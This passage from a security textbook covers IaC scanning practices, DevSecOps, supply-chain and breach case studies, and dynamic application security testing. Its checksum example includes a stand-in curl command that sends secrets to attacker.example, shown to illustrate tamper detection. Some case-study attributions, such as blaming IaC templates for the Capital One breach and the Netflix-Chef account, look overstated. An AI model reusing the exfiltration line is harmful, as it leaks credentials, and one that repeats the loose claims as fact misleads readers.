While both approaches are important for overall security, they have different scopes. IaC scanning is concerned with ensuring that the infrastructure itself is secure, while SAST focuses on the application code. The two can be complementary, as vulnerabilities in the infrastructure can also affect the application and vice versa, but they are distinct approaches that require different tools and expertise to implement effectively. Other important differences include the following:

• Tools: IaC scanning tools analyze infrastructure code (such as Terraform or CloudFormation templates) and provide recommendations for improving security, compliance, and resilience. SAST tools analyze application code (such as Java or Python) and provide recommendations for improving security in the application itself.

• Process: Implementing IaC integrates infrastructure code into the software development process, which means that infrastructure changes are subject to the same code review, testing, and deployment processes as application code. SAST is typically implemented as a separate process from application development and may involve running automated scans on the code periodically.


• Expertise: Implementing IaC requires knowledge of infrastructure design, cloud computing, and automation tools. SAST requires knowledge of programming languages, security vulnerabilities, and secure coding practices.

• Cost: The cost of implementing IaC and SAST can vary widely, depending on the tools, infrastructure, and expertise required. IaC tools may require additional resources to set up and manage, while SAST tools may require specialized expertise to interpret and act on the results.

IaC security best practices

Ensuring security within IaC is paramount, as it directly affects the provisioning and configuration of resources. Here are some detailed IaC security best practices, with examples:

• Use secret management systems: Do not hardcode secrets or sensitive information in your IaC scripts. Instead of embedding API keys or database passwords in a Terraform script, use tools such as AWS Secrets Manager, HashiCorp Vault, or Azure Key Vault to fetch them at runtime.

• Keep IaC configurations in version control: Use version control systems (such as Git) to track changes, audit modifications, and roll back if necessary. Use Git branches to represent different environments; a pull request can act as a gateway for changes, ensuring peer review before deployment.

• Regularly audit and update dependencies: Periodically review and update the modules, plugins, or dependencies your IaC scripts rely on. If you're using Terraform, running terraform init can show whether newer versions of providers or modules are available so that you can consider updating them.

• Principle of least privilege: Grant only the permissions necessary to perform a task and avoid overly permissive policies. If a Terraform script only needs to launch EC2 instances in AWS, ensure the associated IAM policy does not also have permission to modify RDS databases or S3 buckets.

• Immutable infrastructure: Instead of updating existing infrastructure, replace it; this reduces the chance of lingering vulnerabilities. When a new version of an application is ready to be deployed, use a tool such as Packer to create a new machine image, deploy the application on new instances created from that image, and then terminate the old instances.

• Validate IaC scripts with automated tools: Use tools that scan IaC scripts for security misconfigurations or vulnerabilities. Tools such as Checkmarx, Bridgecrew (for Terraform), or tfsec can automatically analyze Terraform scripts for security flaws.


Infrastructure-as-Code (IaC) Scanning

• Isolate environments: Ensure development, staging, and production environments are isolated from each other. Use separate AWS accounts or VPCs for different environments, and avoid using production secrets or credentials in development or staging.
• Implement logging and monitoring: Ensure that all infrastructure deployments and operations are logged and monitored. Set up AWS CloudTrail for AWS deployments or Azure Activity Log for Azure to track activities, and use centralized logging solutions such as the ELK Stack or Graylog to consolidate logs.
• Limit direct access: Limit SSH and RDP access to infrastructure. If access is necessary, use jump hosts, VPNs, or short-lived credentials. Instead of allowing SSH access from any IP, restrict it to a specific IP or VPN. Tools such as AWS Systems Manager Session Manager can provide SSH-like access without the need to open SSH ports.
• Regularly review and refactor IaC scripts: Periodically review IaC scripts to ensure they adhere to updated best practices, and remove any deprecated configurations or resources. Terraform provides terraform fmt for code formatting and terraform validate for checking for inconsistencies or errors.
By following these practices, organizations can significantly improve the security posture of their IaC and the resulting infrastructure. Regular audits, reviews, and continuous education are key to maintaining security in a rapidly evolving tech landscape.
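The “validate with automated tools” practice can be illustrated with a toy scanner in the spirit of tfsec or Checkmarx. This is a minimal sketch: the two regex rules and the Terraform snippet are illustrative, not any real tool’s rule set:

```python
import re

# Two illustrative rules; real scanners such as tfsec ship hundreds of checks.
RULES = [
    ("hardcoded secret", re.compile(r'(password|secret|token)\s*=\s*"[^"]+"', re.I)),
    ("open ingress CIDR", re.compile(r'cidr_blocks\s*=\s*\[\s*"0\.0\.0\.0/0"')),
]

def scan_iac(source: str) -> list:
    """Return (line_number, rule_name) findings for an IaC script."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append((lineno, name))
    return findings

SNIPPET = '''
resource "aws_db_instance" "db" {
  password = "SuperSecret123"
}
resource "aws_security_group_rule" "ssh" {
  cidr_blocks = ["0.0.0.0/0"]
}
'''
print(scan_iac(SNIPPET))
# [(3, 'hardcoded secret'), (6, 'open ingress CIDR')]
```

Run against a CI pipeline, a non-empty findings list would block the merge, which is exactly how these scanners are typically wired in.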

IaC in DevSecOps

IaC plays a critical role in DevSecOps, which integrates development, security, and operations into a unified process. The key principle behind DevSecOps is integrating security practices as a fundamental part of the DevOps process rather than treating them as an afterthought. Let’s dive into how IaC fits into the DevSecOps approach, providing more details and outlining the process.

Understanding DevSecOps

• Definition: DevSecOps emphasizes embedding security checks and controls seamlessly into the DevOps life cycle
• Goal: To catch vulnerabilities and flaws early in the SDLC, thereby reducing risks and achieving both speed and security


The role of IaC in DevSecOps

• Automated provisioning: IaC allows for the automated setup, modification, and scaling of infrastructure, ensuring that the environment is consistently and securely provisioned
• Version control: All infrastructure changes can be tracked, reviewed, and rolled back if necessary, enhancing transparency and accountability
• Reproducibility: IaC ensures environments are consistently reproducible, eliminating the “works on my machine” problem

The DevSecOps process with IaC

1. Planning and coding:
   - Threat modeling: Identify potential threats and design infrastructure to mitigate them
   - IaC scripting: Write IaC scripts to provision the necessary infrastructure
   - Version control: Store IaC scripts in a version control system, such as Git, ensuring that changes are tracked
2. Integration and testing:
   - IaC scanning: Before provisioning, scan IaC scripts for vulnerabilities using tools such as Checkmarx or tfsec
   - CI: Automatically test infrastructure changes to ensure they don’t introduce defects or vulnerabilities
   - Feedback loops: If vulnerabilities or misconfigurations are detected, they are reported back to the development team for immediate rectification
3. Deployment:
   - Automated deployment: Use IaC tools such as Terraform or AWS CloudFormation to automatically deploy infrastructure
   - Immutable infrastructure: Use IaC to enforce immutability, where old infrastructure components are replaced with new ones rather than being modified, reducing vulnerabilities
4. Operations and monitoring:
   - Continuous monitoring: Use monitoring tools to continuously watch for unusual or unauthorized activities
   - Alerting: Set up automated alerts for suspicious activities or when thresholds are breached
   - Infrastructure drift detection: Regularly check to ensure that the actual infrastructure aligns with what’s defined in the IaC scripts


5. Feedback and iteration:
   - Continuous feedback: Incorporate feedback regarding security vulnerabilities or misconfigurations into the IaC scripts
   - Iterative improvement: As new threats emerge or infrastructure needs change, continuously improve and adapt the IaC scripts
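The infrastructure drift detection mentioned in the monitoring step can be sketched as a comparison between the attributes an IaC definition declares and those observed in the live environment. The resource names and attributes below are hypothetical:

```python
def detect_drift(declared, actual):
    """Report attributes whose live value differs from the IaC definition."""
    drift = {}
    for resource, attrs in declared.items():
        live = actual.get(resource, {})
        # Pair up (declared, observed) for every attribute that disagrees
        changed = {k: (v, live.get(k)) for k, v in attrs.items() if live.get(k) != v}
        if changed:
            drift[resource] = changed
    return drift

declared = {"aws_s3_bucket.logs": {"versioning": True, "acl": "private"}}
# Someone flipped the ACL by hand in the console -- classic drift.
actual = {"aws_s3_bucket.logs": {"versioning": True, "acl": "public-read"}}

print(detect_drift(declared, actual))
# {'aws_s3_bucket.logs': {'acl': ('private', 'public-read')}}
```

Real tools do the same conceptual diff (Terraform surfaces it via `terraform plan`), then either alert on the mismatch or re-apply the declared state.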

Key benefits

• Speed and security: IaC in DevSecOps ensures that security doesn’t compromise speed, and vice versa
• Proactive security: Potential threats are mitigated proactively, reducing the chances of breaches or vulnerabilities being exploited
• Cost-effective: By identifying and rectifying vulnerabilities early, organizations can avoid costly fixes in later stages or post-deployment

Challenges and mitigation

• Complexity: With the intertwining of security, development, and operations, processes can become complex. Adopting modular IaC scripts and maintaining documentation can help.
• Skill gaps: DevSecOps requires professionals to understand development, security, and operations. Investing in continuous training and knowledge sharing is essential.

Conclusion and future outlook

As the technological landscape evolves, IaC’s role in DevSecOps will continue to be paramount. Embracing practices such as containerization, serverless architectures, and edge computing will necessitate a robust IaC strategy integrated with DevSecOps.

Open source IaC tools

IaC scanning tools can also generate reports that provide developers with detailed information on security vulnerabilities and misconfigurations, along with recommended remediation steps. This allows developers to quickly address security issues and ensure that infrastructure code is secure and compliant with relevant standards.
There are several IaC tools available in the market, each with its unique features and functionalities. The following are some popular IaC tools:
• Terraform: Terraform is an open source tool developed by HashiCorp. It allows users to describe infrastructure resources using a simple configuration language and manage them through code. Terraform can be used to provision resources in a variety of cloud providers, such as AWS, Azure, Google Cloud, and more.
• Ansible: Ansible is an open source automation tool that can be used for configuration management, application deployment, and provisioning infrastructure. Ansible allows users to define infrastructure as code using a simple YAML-based language. It can be used to manage resources in both cloud and on-premises environments.
• CloudFormation: CloudFormation is an AWS-specific IaC tool that allows users to create and manage AWS resources using templates written in JSON or YAML. It allows users to define infrastructure resources such as EC2 instances, load balancers, and more, and can be used to create, update, and delete resources in a stack.
• Pulumi: Pulumi is an open source IaC tool that allows users to define infrastructure as code using familiar programming languages such as Python, TypeScript, and Go. Pulumi can be used to provision and manage resources in a variety of cloud providers such as AWS, Azure, and Google Cloud.
• Chef: Chef is an open source automation tool that can be used for configuration management, application deployment, and provisioning infrastructure. It allows users to define infrastructure as code using a simple Ruby-based language. Chef can be used to manage resources in both cloud and on-premises environments.
• Puppet: Puppet is an open source IaC tool that offers a declarative language to define infrastructure and automate its management. It is suitable for managing complex environments and offers support for multiple cloud providers.
• SaltStack: SaltStack is an open source IaC tool that enables users to automate infrastructure configuration and management. It is agent-based and supports multiple cloud providers.
These IaC tools provide a range of functionalities, such as defining infrastructure resources, managing the life cycle of resources, version control of infrastructure code, and more. They allow users to manage infrastructure resources in a scalable, efficient, and repeatable way, making it easier to manage complex environments and ensure consistency across deployments.
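What most of these tools share is a declarative model: you state the desired end state, and the tool computes the actions needed to reach it. A toy planner (a sketch of the idea, not any real tool’s algorithm; resource names are made up) makes that concrete:

```python
def plan(desired, current):
    """Diff desired resources against current state into create/update/delete actions."""
    actions = []
    for name, config in desired.items():
        if name not in current:
            actions.append(("create", name))
        elif current[name] != config:
            actions.append(("update", name))
    for name in current:
        if name not in desired:
            # Present in reality but no longer declared -> remove it
            actions.append(("delete", name))
    return actions

desired = {"vm1": {"size": "small"}, "vm2": {"size": "large"}}
current = {"vm1": {"size": "medium"}, "vm3": {"size": "small"}}
print(plan(desired, current))
# [('update', 'vm1'), ('create', 'vm2'), ('delete', 'vm3')]
```

This plan/apply separation is also what makes IaC reviewable: the computed actions can be inspected in a pull request before anything touches production.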

Case study 1 – the Codecov security incident

One example of a security incident related to IaC involves a company called Codecov, which provides code coverage tools for software developers. In April 2021, Codecov announced that their infrastructure had been compromised by an attacker, resulting in a supply chain attack that affected many of their customers.
The attack involved the theft of Codecov’s credentials for an Amazon Web Services (AWS) account, which contained a code signing key for their Bash Uploader tool. This tool is used by many of Codecov’s customers to upload code coverage reports to their platform.


The attacker used the stolen credentials to modify the Bash Uploader code and add a malicious script that collected environment variables, including sensitive data such as access tokens and credentials, and sent them to a remote server controlled by the attacker. This allowed the attacker to gain unauthorized access to many of Codecov’s customers’ systems and data.
This incident highlights the importance of securing IaC tools and processes, as they can be a target for attackers looking to compromise the software supply chain. In this case, the attacker was able to exploit a weakness in Codecov’s IaC process, which allowed them to steal the AWS credentials and modify the Bash Uploader code.
To prevent similar incidents, organizations should ensure that their IaC tools and processes are secure, including using secure authentication and access controls, monitoring for unauthorized modifications, and regularly auditing and updating their infrastructure code. It’s also important to stay informed of security vulnerabilities and patches for IaC tools and components and to have a plan in place for responding to security incidents.
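One concrete safeguard against this class of attack is verifying a downloaded script against a published checksum before executing it; a checksum mismatch is reportedly how a Codecov customer eventually spotted the tampering. A minimal sketch using Python’s standard library (the published digest would come from a separate, trusted channel, and the URLs here are made up):

```python
import hashlib

def verify_script(content: bytes, expected_sha256: str) -> bool:
    """Only run a fetched script if its digest matches the published one."""
    return hashlib.sha256(content).hexdigest() == expected_sha256

script = b'#!/bin/bash\necho "uploading coverage report"\n'
published = hashlib.sha256(script).hexdigest()  # normally fetched from a trusted source

tampered = script + b'curl -d "$SECRETS" https://attacker.example/collect\n'
print(verify_script(script, published))    # True  -> safe to execute
print(verify_script(tampered, published))  # False -> refuse to run
```

The same idea generalizes to signed artifacts and pinned dependency hashes: any mutation of the supply-chain artifact invalidates the digest.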

Case study 2 – Capital One data breach

Another example of the importance of IaC security can be seen in the Capital One data breach that occurred in 2019. In this incident, a hacker exploited a misconfigured firewall in an AWS environment, which led to the theft of the personal information of over 100 million Capital One customers.
The root cause of the breach was a misconfigured web application firewall, which had been misconfigured due to a configuration error in the IaC templates used to deploy the AWS environment. The hacker was able to exploit this misconfiguration and gain access to sensitive data.
This incident highlights the importance of ensuring the security of IaC templates and configurations, as any misconfigurations or vulnerabilities can have serious consequences for the security of the entire infrastructure. It also emphasizes the need for ongoing monitoring and testing to ensure that the infrastructure remains secure and free from vulnerabilities.

Case study 3 – Netflix environment improvement

One example of the benefits of IaC can be seen in the story of how Netflix was able to improve its infrastructure using IaC tools. Before adopting IaC, Netflix had a manually managed infrastructure that was difficult to scale and prone to errors. They needed a solution that would allow them to quickly and easily spin up new resources as needed, while also ensuring consistency and reducing the risk of errors.
To address these challenges, Netflix adopted an IaC approach using the open source tool known as Chef. This allowed them to automate the provisioning of their infrastructure, ensuring that each component was configured consistently and accurately. As a result, Netflix was able to greatly improve its infrastructure’s flexibility and scalability, while also reducing the risk of errors and misconfigurations. The IaC approach also made it easier for Netflix to test and deploy new changes, reducing the time and effort required to make updates.
The story of Netflix’s adoption of IaC highlights the benefits of using these tools to automate infrastructure management, improve consistency and accuracy, and reduce the risk of errors and downtime.

Summary

IaC offers significant advantages in terms of security and operational efficiency. By using IaC tools and processes, organizations can ensure that their infrastructure is consistently and accurately configured, reducing the risk of security vulnerabilities and other issues. IaC also allows organizations to easily scale their infrastructure as needed, making it easier to accommodate changing business needs and handle spikes in traffic or demand. This can help organizations avoid downtime and ensure that critical services remain available and secure.
Despite these benefits, IaC has its limitations and potential risks. IaC scripts can themselves contain errors or vulnerabilities that compromise the security or reliability of the infrastructure. Organizations need to implement appropriate testing, monitoring, and security measures to mitigate these risks and ensure that their IaC implementation remains secure and effective over time.
In this chapter, we covered security testing aspects around IaC. In the next chapter, we’ll learn how to test QA or production environments via dynamic application security testing (DAST).


11
Dynamic Application Security Testing (DAST)

Dynamic application security testing (DAST) is a type of security testing that assesses the security of web applications by analyzing them while they are running. This approach evaluates the application from the outside in, simulating real-world attacks and identifying vulnerabilities that can be exploited by hackers.
DAST works by sending malicious input to an application and observing how the application responds. This can include sending invalid data to input fields, attempting to bypass authentication mechanisms, and trying to access sensitive data without proper authorization. The tool then analyzes the responses to identify any vulnerabilities or weaknesses in the application’s security.
DAST can be used to test a wide range of web applications, including those that are built using programming languages such as Java, .NET, and PHP. The tool can also be used to test applications hosted in various environments, including on-premises, in the cloud, and on mobile devices.
In this chapter, we will cover the following topics:
• What is DAST?
• DAST usage for developers
• DAST usage for security testers
• The importance of DAST in secure development environments
• Comparing DAST with other security testing approaches

What is DAST?

DAST is a security testing process that evaluates a running application, typically a web application, in real time to detect vulnerabilities that could be exploited during its operation. Unlike static analysis, which examines application code without executing it, DAST focuses on the application’s behavior


and data flow during its operation, often from an outsider’s perspective without visibility into the underlying code. A DAST tool could be used to do the following:
• Test for SQL injection vulnerabilities by sending specially crafted input to application forms or URL parameters to see if the app inadvertently executes those inputs as part of a SQL query. If it does, an attacker could potentially access, modify, or delete data from the database.
• Check for cross-site scripting (XSS) by attempting to insert malicious scripts into inputs. If successful, when this input is reflected to a user without being properly sanitized, the script can run in the user’s browser, potentially stealing session cookies or performing actions on the user’s behalf.
• Test for authentication and session management flaws by trying to bypass login forms, hijack sessions, or escalate privileges.
DAST tools actively probe these areas and others, trying to exploit vulnerabilities as a real attacker might, but to identify and resolve the issues rather than cause harm.
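The XSS check described above boils down to sending a script payload and seeing whether it comes back unescaped. The sketch below simulates two application endpoints as plain functions; a real DAST tool would issue HTTP requests against a live application instead:

```python
import html

PAYLOAD = "<script>alert(1)</script>"

def vulnerable_handler(query: str) -> str:
    # Reflects user input into the page without escaping -- an XSS flaw.
    return f"<p>Results for: {query}</p>"

def safe_handler(query: str) -> str:
    # Escapes the input before reflecting it back.
    return f"<p>Results for: {html.escape(query)}</p>"

def probe_for_xss(handler) -> bool:
    """Return True if the script payload is reflected unescaped."""
    return PAYLOAD in handler(PAYLOAD)

print(probe_for_xss(vulnerable_handler))  # True  -> vulnerable
print(probe_for_xss(safe_handler))        # False -> payload was sanitized
```

Production scanners use large payload lists and also check DOM-based and stored variants, but the reflect-and-inspect loop is the same.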

Advantages and limitations of DAST

DAST offers several advantages, such as identifying vulnerabilities that only manifest during runtime, including issues related to authentication, session management, data processing, and more. It tests the application in its real-world operating environment and can catch configuration mistakes and deployment errors. Additionally, DAST is not language-dependent, making it versatile for testing diverse applications. However, its limitations include the potential for a high number of false positives, the inability to provide insight into the location of vulnerabilities within the code base, and the potential to miss design-level flaws since it operates without access to the source code. Furthermore, because DAST tests live applications, there’s a risk of disrupting normal operations if not performed cautiously.
The following are the advantages of DAST:
• DAST can quickly identify vulnerabilities in running applications without access to the source code, making it a valuable tool for testing third-party applications or legacy systems that may not be actively maintained
• DAST simulates real-world attacks on an application, providing a more accurate representation of the application’s security posture than other testing methods
• DAST can be used to test a wide range of web applications, including those built using various programming languages and hosted in different environments
• DAST can identify vulnerabilities that may not be visible from the inside, such as those related to input validation and access control
• DAST can be automated to save time and effort in the testing process


The following are the limitations of DAST:
• DAST may produce false positives or miss certain vulnerabilities if the tool is not configured correctly or if the testing environment does not accurately replicate the production environment
• DAST may be unable to detect vulnerabilities that are not visible from the outside, such as flaws buried within the application’s source code
• DAST may be limited in its ability to detect vulnerabilities in applications with modern architectures, such as single-page applications and those built on JavaScript frameworks
• Many DAST tools are designed around traditional request/response web application models rather than the highly dynamic, client-side-rendered applications that are the norm today
• DAST does not provide a complete picture of an application’s security posture and should be used with other security testing methods, such as SAST and IAST

The DAST process

DAST is a process for testing the security of a web application in real time by simulating attacks and analyzing the application’s response to them. Here’s an overview of the DAST process:
1. Application setup: The first step is to set up the web application for testing. This involves identifying the application’s components, such as web pages, forms, and input fields, and configuring the DAST tool to access and test them.
2. Test configuration: The DAST tool needs to be configured to simulate attacks on the application. This includes setting up parameters such as the number of requests to send, the type of attacks to perform, and the data to be inputted.
3. Attack simulation: The DAST tool then sends requests to the web application, simulating various types of attacks, such as SQL injection, XSS, and cross-site request forgery (CSRF).
4. Result analysis: The tool analyzes the application’s response to the simulated attacks and identifies vulnerabilities, such as insecure authentication mechanisms, SQL injection flaws, or insecure session management.
5. Reporting: The final step is to generate a report of the vulnerabilities discovered by the DAST tool. This report provides information about the vulnerabilities and their potential impact on the application and suggests possible remediation actions.
Overall, the DAST process helps identify security vulnerabilities in a web application and provides remediation guidance. It is an essential component of any comprehensive application security program.
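The reporting step can be sketched as grouping raw findings by severity so the most critical issues surface first. The finding records and fields below are illustrative, not any particular tool’s report schema:

```python
from collections import defaultdict

SEVERITY_ORDER = ["critical", "high", "medium", "low"]

def build_report(findings):
    """Render findings as text lines, most severe first."""
    grouped = defaultdict(list)
    for finding in findings:
        grouped[finding["severity"]].append(finding)
    lines = []
    for severity in SEVERITY_ORDER:
        for finding in grouped[severity]:
            lines.append(f"[{severity.upper()}] {finding['issue']} at {finding['url']}")
    return "\n".join(lines)

findings = [
    {"issue": "Reflected XSS", "url": "/search", "severity": "medium"},
    {"issue": "SQL injection", "url": "/login", "severity": "critical"},
]
print(build_report(findings))
# [CRITICAL] SQL injection at /login
# [MEDIUM] Reflected XSS at /search
```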


DAST usage for developers

Developers play an essential role in building secure applications, and DAST can be a crucial tool in their arsenal. Here’s a detailed guide on how developers can leverage DAST, automate its usage, and innovate with the resulting automation. Integrating DAST into the development process helps not only in identifying and mitigating vulnerabilities but also in fostering a culture of security awareness among developers. The automation capabilities of DAST tools mean developers can innovate, ensuring applications are robust and secure from the earliest stages of development. Let’s discuss the aspects that can be part of the DevSecOps pipeline for developers:
Integration into the SDLC:
• Continuous integration (CI): Developers can integrate DAST tools into their CI pipelines. After every code commit, the DAST tool can automatically scan the running application and provide feedback. This ensures that any vulnerabilities introduced during development are caught early.
• Continuous deployment (CD): Before pushing updates to development, UAT, or pre-production and production environments, the CD process can trigger a DAST scan to ensure no security issues are present.
Feedback loop:
• Developers get instant feedback about the security posture of their applications, allowing them to address vulnerabilities as they are found, instead of after the application is in production. This short feedback loop can lead to better coding practices over time.
Automating routine checks:
• Routine checks for common vulnerabilities, such as XSS, SQL injection, and CSRF, can be automated using DAST tools
Custom scripts and checks:
• Some DAST tools allow developers to write custom scripts or checks. This means developers can tailor the tool to the unique aspects of their application, ensuring thorough and precise scanning.
Innovating with automation:
• API testing: As more applications rely on APIs, developers can use DAST tools to test API endpoints, ensuring they’re secure against potential threats.
• Integration with threat intelligence: Developers can integrate DAST tools with threat intelligence platforms. This ensures the application is tested against the latest known vulnerabilities and threats.
• Interactive application security testing (IAST): Developers can combine DAST with IAST (a method that involves instrumenting the application to monitor its behavior). This combination provides both external and internal views of potential security issues.
Enhanced collaboration:
• Security teams can foster a collaborative environment, bridging the gap between development and security. This ensures that security becomes an integral part of the development process, rather than an afterthought.
Training and skill development:
• As developers use DAST tools, they can gain a deeper understanding of the vulnerabilities they’re testing for, fostering a sense of curiosity and further skill development. Over time, this can lead to writing more secure code from the outset.
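In a CI pipeline, the feedback loop usually ends in a gate: the build fails when the scan reports findings at or above a severity threshold. A hedged sketch with stubbed scan results; a real pipeline would invoke a tool such as OWASP ZAP and parse its report rather than hardcode findings:

```python
SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3, "critical": 4}

def build_may_proceed(findings, fail_at="high"):
    """Pass the gate only if every finding is below the failure threshold."""
    threshold = SEVERITY_RANK[fail_at]
    return all(SEVERITY_RANK[f["severity"]] < threshold for f in findings)

# Stubbed results standing in for a parsed scanner report
scan_results = [
    {"issue": "Missing security header", "severity": "low"},
    {"issue": "SQL injection", "severity": "critical"},
]
print(build_may_proceed(scan_results))  # False -> fail the build
print(build_may_proceed([{"issue": "Missing security header", "severity": "low"}]))  # True
```

Making the threshold configurable per branch (for example, stricter on release branches) is a common refinement.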

DAST usage for security testers

Security testers play a pivotal role in safeguarding applications against vulnerabilities. With the dynamic nature of web applications, testers must employ DAST to stay a step ahead. Let’s explore how security testers can leverage DAST, automate its processes, and innovate using its automation capabilities.
For security testers, DAST provides a powerful means to scan applications in their active environment. The automation capabilities of DAST tools allow for efficiency, thoroughness, and adaptability in testing processes, ensuring that security testing remains effective in the face of evolving threats. By innovating with automation, security testers can ensure a proactive approach to application security, making it an integral part of the SDLC. Let’s understand it in detail:
• Comprehensive vulnerability discovery:
  - Real-world scenarios: DAST allows security testers to evaluate applications in real time, simulating genuine attack scenarios that static testing might miss. It helps in uncovering flaws present during the application’s active state.
  - Coverage: Security testers can identify vulnerabilities across various aspects, such as authentication, session management, data processing, and more.
• Automation in testing:
  - Scheduled scans: Security testers can automate DAST scans at regular intervals or specific stages in the SDLC, ensuring continuous monitoring and timely vulnerability detection.
  - Integrated testing environment: DAST can be integrated with other tools and platforms, creating an automated testing ecosystem. This can include CI/CD pipelines, bug-tracking tools, and more.


• Innovative automation opportunities:
  - Baseline scans: Security testers can establish a baseline for applications by running regular DAST scans, identifying any deviations or newly introduced vulnerabilities promptly
  - Parameterized scans: Advanced DAST tools allow for parameterization, letting testers customize scans based on specific application components or functionality
  - Real-time alerts: With the right setup, DAST tools can provide real-time alerts, allowing testers to act swiftly on high-risk vulnerabilities
  - Integration with other security tools: Security testers can merge results from DAST with other testing tools, such as SAST or IAST, to get a comprehensive view of application security
• Enhancing test depth with custom scripts:
  - Most advanced DAST tools allow for custom scripts. This flexibility enables security testers to tailor tests for specific application behaviors or emerging threats.
• Collaboration and reporting:
  - Security testers can share DAST results with developers and other stakeholders as part of the process via the available toolsets. Detailed reports can pinpoint vulnerability locations and recommend remediation steps, fostering an environment of collaboration.
  - Visualization features in many DAST tools can help in representing vulnerabilities in graphical formats, making it easier for non-technical stakeholders to grasp the security posture.
• Continuous learning and adaptation:
  - The dynamic nature of DAST tools allows security testers to keep pace with the evolving threat landscape. As new attack vectors emerge, testers can adjust DAST configurations, ensuring that scans remain relevant and effective.
  - By working with DAST, security testers can gain insights into the latest attack methodologies and defenses, further honing their skills.
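The baseline-scan idea reduces to a set difference: only findings absent from the approved baseline need fresh attention. A minimal sketch, with finding identities simplified to (issue, url) pairs:

```python
def new_findings(baseline, current):
    """Return findings introduced since the baseline scan."""
    return set(current) - set(baseline)

baseline = [("Reflected XSS", "/search")]  # known, already-triaged findings
current = [("Reflected XSS", "/search"), ("Open redirect", "/login")]

print(new_findings(baseline, current))
# {('Open redirect', '/login')}
```

In practice, finding identity is fuzzier than an exact tuple match (URLs carry volatile parameters, evidence strings vary), so real tools normalize findings before diffing, but the triage logic is this set subtraction.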

The importance of DAST in secure development environments

Incorporating DAST into the application development life cycle is essential to ensure that security is integrated into the entire process. Developers can address vulnerabilities promptly, reducing the risk of a security breach and minimizing the cost of remediation.


Incorporating DAST into the application development life cycle

• Integrate DAST early in the development process to identify and remediate vulnerabilities before they reach production. This proactive approach reduces the risk of security breaches and minimizes the cost of fixing vulnerabilities.
• Schedule regular DAST scans throughout the SDLC to ensure that new vulnerabilities are detected and addressed promptly.
• Include DAST as part of your CI/CD pipeline to automate security testing, either by triggering scans on each pipeline run or on a regular schedule. Automating DAST scans reduces the workload on developers and testers and ensures that testing is performed consistently, promptly, and across all applications.
• Define and customize scan policies to focus on the most relevant threats and reduce false positives. Automated scans should be configured to target specific application components, technologies, and known vulnerabilities.
• Automate the integration of DAST results with other security tools and processes, such as vulnerability management platforms, Security Information and Event Management (SIEM) systems, and threat intelligence feeds.
Identifying and prioritizing vulnerabilities is essential to ensure that the most critical issues are addressed first. This can be achieved by using DAST reports to identify vulnerabilities and assigning a severity level to each one based on its potential impact on the application. High-severity vulnerabilities should be addressed first, followed by medium- and low-severity vulnerabilities:
• Identifying and prioritizing vulnerabilities:
  - Risk-based prioritization: Evaluate and prioritize vulnerabilities based on factors such as their severity, potential impact, and exploitability. Focus on addressing the most critical vulnerabilities first.
  - Validating findings: Manually review the results of automated DAST scans to validate the findings and address any discrepancies, such as false positives or false negatives.
• Collaborating with developers and security teams: Collaboration is essential to ensure that vulnerabilities are addressed in a timely and effective manner. This can be achieved by sharing DAST reports with developers and security teams, holding regular meetings to discuss the progress of remediation efforts, and providing training and guidance on best practices for secure application development:
  - Foster a security culture: Encourage collaboration between development, security, and operations teams to ensure that security concerns are addressed throughout the SDLC.
  - Training and awareness: Provide developers with training on secure coding practices and educate them on the importance of application security. This helps ensure that security is considered at every stage of the development process.
  - Clear communication: Communicate DAST findings in a clear and actionable manner, providing developers with the information they need to understand and remediate vulnerabilities.
By following these best practices, organizations can ensure that their applications are secure and free from vulnerabilities, reducing the risk of a security breach and protecting their business operations.
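The risk-based prioritization above can be sketched as a weighted score over severity, exploitability, and asset criticality. The weights and the 0-10 inputs are illustrative, not a standard such as CVSS:

```python
# Illustrative weights; a real program would calibrate these to its risk model.
WEIGHTS = {"severity": 0.5, "exploitability": 0.3, "asset_criticality": 0.2}

def risk_score(vuln):
    """Weighted 0-10 score; higher means fix sooner."""
    return sum(vuln[factor] * weight for factor, weight in WEIGHTS.items())

vulns = [
    {"name": "SQL injection on /login", "severity": 9, "exploitability": 8, "asset_criticality": 10},
    {"name": "Verbose error page", "severity": 3, "exploitability": 5, "asset_criticality": 4},
]
for vuln in sorted(vulns, key=risk_score, reverse=True):
    print(f"{risk_score(vuln):.1f}  {vuln['name']}")
# 8.9  SQL injection on /login
# 3.8  Verbose error page
```

The point of scoring rather than using severity alone is that a medium-severity flaw on a crown-jewel system can outrank a high-severity flaw on a throwaway one.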

Advanced DAST techniques In addition to the basic concepts and best practices for DAST, several advanced techniques can be used to enhance the effectiveness of the testing. In this section, I will cover some of these techniques, including fuzz testing, authentication testing, API testing, and mobile application testing: • Fuzz testing: Fuzz testing, also known as fuzzing, is a technique that involves sending random or malformed input data to an application to test how it responds. This technique is used to identify vulnerabilities such as buffer overflows, injection attacks, and format string vulnerabilities. Fuzz testing can be done manually or with the help of automated tools. DAST tools, such as Burp Suite, OWASP ZAP, and Acunetix, include fuzz testing capabilities. • Authentication testing: Authentication testing involves testing an application’s authentication and authorization mechanisms to ensure that they are secure and effective. This includes testing for weak passwords, session fixation, and authentication bypass vulnerabilities. Authentication testing can be done manually or with the help of automated tools. Some DAST tools, such as Netsparker, include authentication testing capabilities. • API testing: API testing involves testing the APIs that are used to interact with an application. API testing can be done manually or with the help of automated tools. Some DAST tools, such as Postman and SoapUI, include API testing capabilities. API testing involves assessing the security of the application’s APIs, which often serve as a critical communication channel between different components and services.

The importance of DAST in secure development environments

We can perform API testing by keeping the following things in mind:

‚ Input validation: Test for vulnerabilities such as SQL injection, XSS, and remote code execution by sending malicious input data to the API endpoints
‚ Access controls: Verify that proper access controls are in place to prevent unauthorized access to sensitive API endpoints and data
‚ Rate limiting: Check if the API has rate limiting to prevent Denial-of-Service (DoS) attacks

• Mobile application testing: Mobile application testing involves testing the security of mobile applications on various platforms, such as iOS and Android. It can be done manually or with the help of automated tools; some DAST tools, such as AppScan and Mobile Security Framework (MobSF), include mobile application testing capabilities. Mobile application testing assesses the security of applications running on devices such as smartphones and tablets:

‚ Data storage: Test for insecure data storage practices, such as storing sensitive data in plain text or easily accessible locations
‚ Communication security: Verify the proper implementation of secure communication channels, such as SSL/TLS, to protect data in transit between the mobile application and its backend services
‚ Reverse engineering: Assess the application’s resilience to reverse engineering and code tampering by checking for obfuscation techniques and proper signing of the application package

These advanced techniques can enhance the effectiveness of DAST testing. Organizations can use them to identify and mitigate vulnerabilities that traditional testing methods may miss. It is important to incorporate these techniques into a broader security testing program that includes other types of testing, such as SAST and manual testing, to ensure comprehensive application security.
